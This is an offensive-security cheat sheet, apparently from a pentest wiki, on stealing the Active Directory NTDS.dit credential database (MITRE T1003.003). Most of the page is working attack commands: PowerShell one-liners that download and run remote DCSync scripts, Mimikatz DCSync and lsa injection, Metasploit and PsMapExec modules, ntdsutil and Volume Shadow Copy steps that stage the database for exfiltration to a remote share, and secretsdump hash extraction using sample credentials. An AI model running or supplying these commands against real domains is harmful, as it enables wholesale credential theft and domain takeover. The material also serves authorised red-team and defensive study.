# NTDS

**ATT\&CK ID:** [T1003.003](https://attack.mitre.org/techniques/T1003/003/)

**Permissions Required:** <mark style="color:red;">**Administrator**</mark> | <mark style="color:red;">**SYSTEM**</mark>

**Description**

Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. By default, the NTDS file (NTDS.dit) is located in `%SystemRoot%\NTDS\Ntds.dit` of a domain controller.

In addition to looking for NTDS files on active Domain Controllers, adversaries may search for backups that contain the same or similar information.

## Techniques

### Invoke-DCsync (PentestFactory)

**URL:** <https://github.com/pentestfactory/Invoke-DCSync>

Invoke-DCsync pulls Mimikatz,PowerView and ADRecon from Github into memory and then performs DCSync.

```powershell
# Load into memory
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/pentestfactory/Invoke-DCSync/main/Invoke-DCSync.ps1")

# Execute
Invoke-DCSync
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F9j3Q7W3hGVBiSdptgBrN%2FInvoke-DCsync.png?alt=media\&token=ead8fdfe-9ed2-4430-bdfc-45325bbf231e)

### Invoke-DCSync (S3cur3Th1sSh1t)

```powershell
# Load into memory
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/PowershellScripts/Invoke-DCSync.ps1")

# Execute
Invoke-DCSync -dcfqdn DC01.security.local -username administrator
```

<figure><img src="https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F7OVPg0G0P50zG1MEKiNq%2Fimage.png?alt=media&#x26;token=96bb6689-60d0-4759-a536-b2ccfb7cf042" alt=""><figcaption></figcaption></figure>

### Metasploit

```
use auxiliary/admin/smb/psexec_ntdsgrab
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fl2XLXGq87dDXELEuMgy9%2Fimage.png?alt=media\&token=dd7cf4be-3c20-4c77-84e5-7adc44f46c09)

`secretsdump.py` can then be used to pull hashes from the `ntds.dit` database using the SYSTEM hive file (ref: secretsdump.py further down).

### Mimikatz

```powershell
# Dump hashes for a specified users
Invoke-Mimikatz -command '"lsadump::dcsync /domain:security.local /user:moe"'

# Dump hashes for all users
Invoke-Mimikatz -command '"lsadump::dcsync /domain:security.local /all"'

# Dump hashes by injecting into the lsass process on the Domain Controller
Invoke-Mimikatz -command '"lsadump::lsa /inject"'
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F9ZfAx56YBQ8xqBJb0LHx%2FMimikatz-user.png?alt=media\&token=0e76216e-222c-4645-a4ff-2176eceacf1e)

### ntdsutil.exe (Native)

With access to the Domain Controller its possible to run the `ntdsutil.exe` native binary to dump SAM, SYSTEM and ntds.dit ready for exfiltration.

```powershell
powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\Exfiltration' q q"

# Dump to remote share
powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full \\10.10.10.10\Share\Exf' q q"
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FbBbZwZjAl9UUwUomV6PT%2Fntdsutil.exe.png?alt=media\&token=3a8331d1-f1bd-49c5-bdac-063432afa1d1)

Viewing the contents of `c:\Exfiltration` we see the files.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FpOuEWzPoj2Ib3rxhJEZp%2Fntdsuitl.exe%20results.png?alt=media\&token=c203a16f-59b1-4276-9004-202d2e4a9375)

Secretsdump we can be used against these files for extraction as shown in the `secretsdump.py` section below.

### Secretsdump.py

```bash
# With valid credentials
secretsdump.py security.local/moe:Password123@10.10.10.100 -just-dc-ntlm
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FZhhRcK2fgsfqp3hLUscZ%2Fimage.png?alt=media\&token=ae75f1f6-ce07-41c3-b4d9-8f928d3557e5)

```bash
# Dump from exfiltrated ntds.dit and SYSTEM files.
sudo secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FVm5RaGlFBMxfQ1knhMVe%2Fimage.png?alt=media\&token=b1b9d3fc-8062-420d-9cc0-f1fce3da1c38)

```bash
# Dump results from ntdsutil.exe method
secretsdump.py -system SYSTEM -security SECURITY -ntds ntds.dit LOCAL
```

### PsMapExec

```powershell
# As current user
PsMapExec -Targets DCs -Method SMB -Module NTDS

# As a specified user
PsMapExec -Targets DCs -Method SMB -Module NTDS -Username Administrator -Password Password123!
```

<figure><img src="https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FxYiXa0P5PBMIUGQwLSof%2Fimage.png?alt=media&#x26;token=891e5b23-6e4c-4784-921f-dc5bfef37235" alt=""><figcaption></figcaption></figure>

### Volume Shadow Copy

```bash
# Create VSS snapshot of system drive
vssadmin create shadow /for=C:

# create a copy of NTDS.dit and SYSTEM then move to C:\Exfiltration
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit C:\Exfiltration
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\System32\config\SYSTEM C:\Exfiltration
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FmZFMeGemWY2EkqM1JmYE%2Fvss-copy.png?alt=media\&token=55d02f9e-bfaa-4a49-93f7-85e7b376bdbb)

The NTDS.dit and SYSTEM files can be exfiltrated off the system and used with a tool such as `secretsdump.py` for hash extraction.